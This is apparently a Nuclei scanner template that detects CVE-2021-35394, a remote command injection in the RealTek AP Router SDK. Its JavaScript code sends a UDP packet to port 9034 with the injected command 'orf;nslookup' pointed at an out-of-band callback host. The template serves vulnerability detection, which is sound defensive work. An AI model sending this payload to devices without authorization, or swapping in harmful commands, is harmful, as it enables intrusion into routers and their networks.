id: CVE-2021-35394

info:
  name: RealTek AP Router SDK - Arbitrary Command Injection
  author: king-alexander
  severity: critical
  remediation: Apply the latest security patches or updates provided by RealTek.
  description: The SDK exposes a UDP server that allows remote execution of arbitray commands.
  impact: |
    Attackers can execute arbitrary commands remotely through the exposed UDP server port by sending specially crafted commands to RealTek AP Router SDK devices.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-35394
    - https://blogs.juniper.net/en-us/threat-research/realtek-cve-2021-35394-exploited-in-the-wild
  classification:
    epss-score: 0.9422
    epss-percentile: 0.99928
  tags: cve,cve2021,realtek,rce,kev,vkev,vuln

javascript:
  - pre-condition: |
      isUDPPortOpen(Host,Port);
    code: |
      let packet = bytes.NewBuffer();
      let message = `orf;nslookup ${OAST}`
      let data = message;
      packet.WriteString(data)
      let c = require("nuclei/net");
      let conn = c.Open('udp', `${Host}:${Port}`);
      conn.SendHex(packet.Hex());

    args:
      Host: "{{Host}}"
      Port: 9034
      OAST: "{{interactsh-url}}"

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4a0a0047304502206aa046bc29ad14472a053bfeb405be96365fd05c5ddbb43e5f179fe3d0b03849022100937abc9681d9aa4fb7c94ddeecca479997c8dc613deb763968c560755126f719:922c64590222798bb761d5b6d8e72950